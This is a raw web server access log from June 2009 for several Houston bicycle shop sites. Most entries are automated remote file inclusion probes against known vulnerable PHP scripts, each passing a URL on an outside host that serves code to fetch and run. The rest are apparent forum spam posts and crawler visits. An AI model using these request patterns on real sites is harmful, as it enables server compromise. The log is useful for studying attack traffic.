121.124.127.164 - - [12/Jun/2009:08:48:27 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
121.124.127.164 - - [12/Jun/2009:08:48:28 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.149.26.131 - - [12/Jun/2009:08:49:19 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.149.26.131 - - [12/Jun/2009:08:49:19 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.149.26.131 - - [12/Jun/2009:08:49:19 -0700] "GET /logs/access.log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
81.19.67.243 - - [12/Jun/2009:08:50:58 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
62.149.26.131 - - [12/Jun/2009:08:52:19 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.149.26.131 - - [12/Jun/2009:08:52:19 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.149.26.131 - - [12/Jun/2009:08:52:19 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.160.145 - - [12/Jun/2009:08:54:50 -0700] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "houstonbikeshop.com"
222.122.160.145 - - [12/Jun/2009:08:54:50 -0700] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "houstonbikeshop.com"
121.124.127.164 - - [12/Jun/2009:08:54:54 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
121.124.127.164 - - [12/Jun/2009:08:54:54 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
121.124.127.164 - - [12/Jun/2009:08:54:55 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
217.19.238.72 - - [12/Jun/2009:08:57:30 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
217.19.238.72 - - [12/Jun/2009:08:57:30 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
217.19.238.72 - - [12/Jun/2009:08:57:30 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
81.19.66.38 - - [12/Jun/2009:08:58:22 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [12/Jun/2009:08:58:24 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [12/Jun/2009:08:58:25 -0700] "GET /bullitinboard/viewtopic.php?p=2005 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [12/Jun/2009:08:58:25 -0700] "GET /bullitinboard/viewtopic.php?p=2036 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [12/Jun/2009:08:58:25 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
217.19.238.72 - - [12/Jun/2009:09:01:19 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
217.19.238.72 - - [12/Jun/2009:09:01:24 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
217.19.238.72 - - [12/Jun/2009:09:01:24 -0700] "GET /logs/access.log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
217.19.238.72 - - [12/Jun/2009:09:01:34 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
217.19.238.72 - - [12/Jun/2009:09:01:34 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
217.19.238.72 - - [12/Jun/2009:09:01:34 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
170.189.193.3 - - [12/Jun/2009:09:07:14 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MS-RTC LM 8; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.svbikes.com"
170.189.193.3 - - [12/Jun/2009:09:07:22 -0700] "GET /Employeesite/ HTTP/1.1" 401 395 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MS-RTC LM 8; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.svbikes.com"
222.122.160.145 - - [12/Jun/2009:09:13:57 -0700] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "houstonbikeshop.com"
222.122.160.145 - - [12/Jun/2009:09:13:57 -0700] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "houstonbikeshop.com"
91.121.150.170 - - [12/Jun/2009:09:22:32 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
118.129.166.10 - - [12/Jun/2009:09:23:34 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/main.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
118.129.166.10 - - [12/Jun/2009:09:23:34 -0700] "GET /logs///administrator/components/com_virtuemart/main.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
118.129.166.10 - - [12/Jun/2009:09:23:37 -0700] "GET //administrator/components/com_virtuemart/main.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [12/Jun/2009:09:28:30 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://rsh.kiev.ua/dama/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [12/Jun/2009:09:28:30 -0700] "GET /skin/zero_vote/error.php?dir=http://rsh.kiev.ua/dama/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [12/Jun/2009:09:28:30 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://rsh.kiev.ua/dama/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [12/Jun/2009:09:29:23 -0700] "GET /skin/zero_vote/error.php?dir=http://rsh.kiev.ua/dama/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [12/Jun/2009:09:29:23 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://rsh.kiev.ua/dama/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [12/Jun/2009:09:29:23 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://rsh.kiev.ua/dama/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [12/Jun/2009:09:29:23 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://rsh.kiev.ua/dama/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [12/Jun/2009:09:29:24 -0700] "GET /skin/zero_vote/error.php?dir=http://rsh.kiev.ua/dama/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [12/Jun/2009:09:29:24 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://rsh.kiev.ua/dama/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.195.124.11 - - [12/Jun/2009:09:29:32 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://rsh.kiev.ua/dama/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.195.124.11 - - [12/Jun/2009:09:29:32 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://rsh.kiev.ua/dama/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.195.124.11 - - [12/Jun/2009:09:29:32 -0700] "GET /skin/zero_vote/error.php?dir=http://rsh.kiev.ua/dama/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [12/Jun/2009:09:33:03 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 518 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
77.221.130.17 - - [12/Jun/2009:09:35:45 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://rsh.kiev.ua/dama/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [12/Jun/2009:09:36:24 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://rsh.kiev.ua/dama/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [12/Jun/2009:09:36:27 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://rsh.kiev.ua/dama/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.27.203.107 - - [12/Jun/2009:09:36:42 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://designmono.com/zboard_bbs/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
218.27.203.107 - - [12/Jun/2009:09:36:42 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://designmono.com/zboard_bbs/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
218.27.203.107 - - [12/Jun/2009:09:36:42 -0700] "GET /skin/zero_vote/error.php?dir=http://designmono.com/zboard_bbs/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
218.27.203.107 - - [12/Jun/2009:09:37:21 -0700] "GET /logs/access.log%20//skin/zero_vote/error.php?dir=http://designmono.com/zboard_bbs/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
91.195.124.11 - - [12/Jun/2009:09:38:01 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://rsh.kiev.ua/dama/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.246.20.221 - - [12/Jun/2009:09:38:48 -0700] "GET /skin/zero_vote/error.php?dir=http://rsh.kiev.ua/dama/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.246.20.221 - - [12/Jun/2009:09:38:48 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://rsh.kiev.ua/dama/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.246.20.221 - - [12/Jun/2009:09:38:48 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://rsh.kiev.ua/dama/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [12/Jun/2009:09:38:57 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
118.129.166.10 - - [12/Jun/2009:09:40:54 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.129.166.10 - - [12/Jun/2009:09:40:54 -0700] "GET /translations/Spanish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.129.166.10 - - [12/Jun/2009:09:40:54 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.129.166.10 - - [12/Jun/2009:09:41:15 -0700] "GET /translations/Finnish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.129.166.10 - - [12/Jun/2009:09:41:46 -0700] "GET /translations/Spanish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.129.166.10 - - [12/Jun/2009:09:41:46 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.129.166.10 - - [12/Jun/2009:09:41:46 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.129.166.10 - - [12/Jun/2009:09:42:05 -0700] "GET /translations/Finnish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.129.166.10 - - [12/Jun/2009:09:42:22 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.129.166.10 - - [12/Jun/2009:09:42:22 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.129.166.10 - - [12/Jun/2009:09:42:22 -0700] "GET /translations/Spanish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.129.166.10 - - [12/Jun/2009:09:42:32 -0700] "GET /translations/Finnish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.129.166.10 - - [12/Jun/2009:09:43:33 -0700] "GET /translations/Spanish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.129.166.10 - - [12/Jun/2009:09:43:42 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.129.166.10 - - [12/Jun/2009:09:43:42 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.129.166.10 - - [12/Jun/2009:09:43:49 -0700] "GET /translations/Finnish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.129.166.10 - - [12/Jun/2009:09:44:04 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
118.129.166.10 - - [12/Jun/2009:09:44:04 -0700] "GET /translations/Hungarian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
118.129.166.10 - - [12/Jun/2009:09:44:04 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
118.129.166.10 - - [12/Jun/2009:09:44:04 -0700] "GET /translations/Italian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
118.129.166.10 - - [12/Jun/2009:09:44:34 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
118.129.166.10 - - [12/Jun/2009:09:44:34 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
118.129.166.10 - - [12/Jun/2009:09:44:34 -0700] "GET /translations/Hungarian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
118.129.166.10 - - [12/Jun/2009:09:44:37 -0700] "GET /translations/Italian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
118.129.166.10 - - [12/Jun/2009:09:44:59 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
118.129.166.10 - - [12/Jun/2009:09:45:00 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
118.129.166.10 - - [12/Jun/2009:09:45:00 -0700] "GET /translations/Italian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
118.129.166.10 - - [12/Jun/2009:09:45:00 -0700] "GET /translations/Hungarian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
118.129.166.10 - - [12/Jun/2009:09:46:27 -0700] "GET /translations/Italian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
118.129.166.10 - - [12/Jun/2009:09:46:27 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
118.129.166.10 - - [12/Jun/2009:09:46:27 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
118.129.166.10 - - [12/Jun/2009:09:46:27 -0700] "GET /translations/Hungarian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
65.55.106.136 - - [12/Jun/2009:09:48:12 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
119.63.194.90 - - [12/Jun/2009:09:49:13 -0700] "GET /bullitinboard/viewtopic.php?p=15375 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "houstonbikeshop.com"
118.129.166.10 - - [12/Jun/2009:09:54:12 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.129.166.10 - - [12/Jun/2009:09:54:12 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
204.62.53.203 - - [12/Jun/2009:09:55:39 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
118.129.166.10 - - [12/Jun/2009:09:56:02 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.129.166.10 - - [12/Jun/2009:09:56:02 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.129.166.10 - - [12/Jun/2009:09:57:27 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.129.166.10 - - [12/Jun/2009:09:57:28 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.129.166.10 - - [12/Jun/2009:09:59:45 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.129.166.10 - - [12/Jun/2009:09:59:53 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
222.122.160.145 - - [12/Jun/2009:10:03:40 -0700] "GET /classes/core/language.php?rootdir=http://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "houstonbikeshop.com"
222.122.160.145 - - [12/Jun/2009:10:03:40 -0700] "GET /logs/classes/core/language.php?rootdir=http://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "houstonbikeshop.com"
222.122.160.145 - - [12/Jun/2009:10:18:13 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "houstonbikeshop.com"
222.122.160.145 - - [12/Jun/2009:10:18:13 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "houstonbikeshop.com"
66.225.228.90 - - [12/Jun/2009:10:21:33 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://poool00.cfun.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "bicyclestoreshouston.com"
66.225.228.90 - - [12/Jun/2009:10:21:33 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://poool00.cfun.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "bicyclestoreshouston.com"
66.225.228.90 - - [12/Jun/2009:10:21:34 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://poool00.cfun.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "bicyclestoreshouston.com"
66.225.228.90 - - [12/Jun/2009:10:21:56 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://poool00.cfun.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "bicyclestoreshouston.com"
66.225.228.90 - - [12/Jun/2009:10:22:16 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://poool00.cfun.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "houstonbikeshop.com"
